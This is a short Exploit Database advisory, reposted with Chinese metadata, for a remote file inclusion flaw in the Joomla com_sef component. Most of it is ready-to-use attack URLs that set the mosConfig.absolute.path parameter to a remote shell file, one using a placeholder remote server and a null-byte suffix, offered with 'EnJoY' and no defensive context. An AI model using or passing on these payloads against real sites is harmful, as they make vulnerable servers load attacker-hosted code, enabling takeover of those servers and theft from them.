Joomla! Component com_sef – Remote File Inclusion

• Exploit Database
• 79 阅读

• 作者： Li0n-PaL
  日期： 2010-06-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14055/

• ==========================================================
  Joomla Component (com_sef) RFI
  ===========================================================
  
  WWw.HaCkTeacH.oRg/cc
   
  +===================================================================================+
  [?]Joomla Component (com_sef) RFI
  +===================================================================================+
  [?] My home:[http://HaCkTeCh.Org/cc ]
  [?] For Ask:[F5w@hotmail.com ]
  [?] Script: [ joomla]
  [?] home Script [ http://www.joomla.com/app ]
  [?] Language: [ PHP]
  [?] Founder:[ Li0n-PaL ]
  [?] Gr44tz to:[ Pal-Li0n - Red-D3v1L - Shadow-D3v1L - All HaCkTeacH CreW ]
  
  ===[ Exploit]===
  http://localhost/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=[shell.txt?]
  
  DeMo ~
  
  http://www.example.com/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://[remote-server]/[file]%00
  
  
  EnJoY o_O
  
  ---------------------------------------------------------
  
  ./exit